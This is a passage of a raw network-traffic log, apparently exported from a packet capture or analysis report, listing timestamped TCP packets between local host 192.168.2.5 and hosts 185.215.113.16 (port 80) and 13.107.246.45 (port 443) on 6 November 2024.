                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.167494059 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.212186098 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.212212086 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.212464094 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.212464094 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.212476969 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.212527990 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.215656996 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.234307051 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.234330893 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.234394073 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.234401941 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.234445095 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.236277103 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.236295938 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.236347914 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.236355066 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.236413002 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247402906 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247430086 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247447968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247459888 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247473955 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247504950 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247575045 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247586012 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247596979 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247608900 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247627974 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247629881 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247642994 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247653008 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247658968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247670889 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247678995 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247682095 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247694016 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247704983 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247709036 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247715950 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247721910 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247730017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247741938 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247752905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247762918 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247765064 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247785091 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247797966 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247899055 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247910023 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247920036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247931957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247942924 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247942924 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247967005 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247981071 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247988939 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.247991085 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248009920 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248028994 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248219013 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248330116 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248341084 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248351097 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248363018 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248369932 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248378038 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248388052 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248393059 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248419046 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248456955 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248470068 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248481035 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248488903 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248492002 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248514891 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248516083 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248527050 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248537064 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248543024 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248549938 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248563051 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248624086 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248624086 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248634100 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248644114 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248655081 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248666048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248672962 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248687983 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.248707056 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.262136936 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.273880005 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.273906946 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.273950100 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.273962021 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.273998022 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.274019003 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.281577110 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.287864923 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.287905931 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.287925959 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.287935019 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.287945032 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.287961006 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.287966013 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.287971020 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.287992001 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288003922 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288007975 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288017035 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288028955 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288053989 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288067102 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288090944 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288115978 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288129091 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288131952 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288144112 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288156033 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288167000 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288170099 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288182020 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288193941 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288196087 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288212061 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288238049 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288249969 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288268089 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288273096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288285017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288300991 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288304090 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288320065 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288331032 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288341999 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288350105 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288362980 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288367987 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288377047 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288388968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288403988 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288434029 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288573980 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288593054 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288605928 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288625956 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288742065 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288757086 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288772106 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288773060 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288785934 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288798094 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288803101 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288810968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288827896 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288837910 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288867950 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288877964 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288883924 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288897038 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288909912 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288913965 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288924932 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288937092 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288949013 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288950920 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288961887 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288974047 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288976908 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288992882 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.288994074 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289011002 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289024115 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289030075 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289047956 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289062977 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289064884 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289076090 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289089918 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289098978 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289124966 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289129019 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289144993 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289158106 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289180994 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289216042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289232016 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289243937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289252043 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289257050 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289271116 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289280891 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289304972 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289323092 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289345026 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289360046 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289381981 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289413929 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289426088 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289436102 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289446115 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289446115 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289460897 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289469957 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289474010 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289499998 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289542913 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289555073 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289566040 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289582014 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289593935 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289593935 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289593935 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289608002 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289622068 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289633036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289639950 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289664030 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289678097 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289696932 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289709091 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289712906 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289726973 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289738894 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289748907 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289751053 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289762020 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289764881 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289774895 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289792061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289797068 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.289820910 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290146112 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290164948 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290182114 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290203094 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290204048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290218115 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290230036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290240049 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290268898 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290312052 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290324926 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290334940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290347099 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290358067 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290359020 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290374041 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290374994 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290410995 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290452957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290468931 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290479898 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290493965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290503979 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290505886 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290518999 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290529013 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290532112 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290545940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290558100 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290563107 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290580034 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290589094 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290600061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290613890 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290622950 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290637016 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290652990 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290656090 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290664911 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290678024 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290687084 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290690899 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290703058 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.290710926 CET4971980192.168.2.5185.215.113.16
